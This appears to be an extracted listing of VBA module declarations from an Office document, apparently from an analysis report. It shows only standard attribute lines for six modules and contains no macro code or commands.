                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = False

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = False

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = False

                                                                                                                                                  Module: Class2

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Class2"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = False

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = False

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = False

                                                                                                                                                  Module: Class3

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Class3"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = False

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = False

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = False

                                                                                                                                                  Module: Kikide

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Kikide"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: UserForm1

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "UserForm1"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = False

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = False

                                                                                                                                                  Module: Vrest

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Vrest"

                                                                                                                                                  Module: Vsewd

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Vsewd"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Reset < >